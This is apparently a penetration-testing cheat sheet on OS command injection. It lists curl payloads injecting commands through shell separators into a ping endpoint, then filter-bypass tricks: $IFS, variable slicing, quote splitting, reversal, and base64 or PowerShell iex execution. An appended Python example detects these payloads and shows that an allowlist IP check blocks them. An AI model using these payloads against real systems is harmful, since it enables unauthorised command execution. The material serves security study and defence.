Command Injection#
The injected input terminates the previous command and appends our own.
Check each of ; %26 %0a %26%26 || | and see which of them gets through.
## Run both commands regardless of the 1st's result
curl -s "http://$target/ping?ip=127.0.0.1;id"
## 1st runs in the background, then the 2nd runs
curl -s "http://$target/ping?ip=127.0.0.1%26id"
## Run both; %0a is a newline '\n'
curl -s "http://$target/ping?ip=127.0.0.1%0aid"
## Run the 2nd only if the 1st succeeds
curl -s "http://$target/ping?ip=127.0.0.1%26%26id"
## Run the 2nd only if the 1st fails
curl -s "http://$target/ping?ip=127.0.||id"
## Pipe
curl -s "http://$target/ping?ip=127.0.0.1|id"
Blacklisted/WAF bypass#
Space %20#
Use tab %09, $IFS, or brace expansion {ls,-la}; yes, it works with sh on Linux
Forward slash /#
Use ${PATH:0:1}, ${HOME:0:1}, ${PWD:0:1}
Semi-colon ;#
Use ${LS_COLORS:10:1}
Backslash \#
Consider %HOMEPATH% is \User\www-data: ~6 is the starting position and -9 is the negative end position, i.e. the negative of the number of characters in the username + 1 (Windows is weird).
echo %HOMEPATH:~6,-11%
Same command in PowerShell:
$env:HOMEPATH[0]
$env:PROGRAMFILES[10]
Commands#
If the WAF is blocking some commands like whoami or id:
Linux sh#
## Quotes don't matter to sh
w'h'o'am'i
w"h"o"am"i
## $@ expands to nothing when there are no positional parameters; \ before a plain character is dropped
who$@ami
w\ho\am\i
## convert all UPPERCASE to lowercase
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
## Reverse
$(rev<<<'imaohw')
$(echo 'imaohw' | rev)
## Base64 encoded
$(base64 -d<<<d2hvYW1p)
$(echo 'd2hvYW1p' | base64 -d)
bash<<<$(base64 -d<<<d2hvYW1p)
bash<<<$(echo 'd2hvYW1p' | base64 -d)
Windows#
who^ami
## Case doesn't matter on Windows
WhOaMi
## Reverse
iex "$('imaohw'[-1..-20] -join '')"
Base64 encoded:
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
or:
echo -n whoami | iconv -t utf-16le | base64
Execute:
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
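From the defending side, the separator list at the top and the $IFS / ${VAR:n:m} tricks above are exactly what a blacklist filter misses once input is URL-decoded. The following is an added example (not from the original sheet): it decodes the ip parameter from constructed request lines in the shape of the curl calls above, reports which separators or expansions are present, and shows that an allowlist check (the value must be a literal IP address) rejects every variant whatever the encoding. The /ping path and the ip parameter name come from the sheet; the log lines and all function names are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# Separators from the sheet, longest first; matched after URL-decoding.
SEPARATORS = [("&&", "and"), ("||", "or"), ("\n", "newline"), ("$(", "subshell"),
              (";", "chain"), ("&", "background"), ("|", "pipe"), ("`", "backtick")]
# Parameter expansions used to smuggle a space, '/' or ';' past a character
# blacklist: $IFS, ${IFS}, ${PATH:0:1}, ${LS_COLORS:10:1}, ...
EXPANSION = re.compile(r"\$\{?[A-Za-z_][A-Za-z0-9_]*(?::\d+:\d+)?\}?")

# Constructed request lines in the shape of the curl calls above.
SAMPLE_REQUESTS = [
    "GET /ping?ip=127.0.0.1 HTTP/1.1",
    "GET /ping?ip=127.0.0.1;id HTTP/1.1",
    "GET /ping?ip=127.0.0.1%26%26id HTTP/1.1",
    "GET /ping?ip=127.0.0.1%0aid HTTP/1.1",
    "GET /ping?ip=127.0.0.1%3B$%7BIFS%7Did HTTP/1.1",
]

def ip_param(request_line):
    """Return the URL-decoded 'ip' query value of a request line, or None."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    for pair in urlsplit(parts[1]).query.split("&"):  # split before decoding
        key, _, raw = pair.partition("=")
        if key == "ip":
            return unquote(raw)
    return None

def flag_injection(value):
    """Names of the shell separators / expansions present in a decoded value."""
    hits, rest = [], value
    for sep, name in SEPARATORS:
        if sep in rest:
            hits.append(name)
            rest = rest.replace(sep, " ")  # so '&&' is not also counted as '&'
    if EXPANSION.search(value):
        hits.append("expansion")
    return hits

def is_safe_ip(value):
    """Allowlist check: accept only a literal IPv4/IPv6 address, nothing else."""
    try:
        return ipaddress.ip_address(value) is not None
    except ValueError:
        return False

def scan(lines):
    """Per request line: (allowlist verdict, blacklist-style flags)."""
    return {l: (is_safe_ip(v), flag_injection(v)) for l in lines if (v := ip_param(l)) is not None}
```

The point of running both checks side by side: the flags only catch the operators the list already knows, while the allowlist rejects every request except the clean one without needing to know any separator at all.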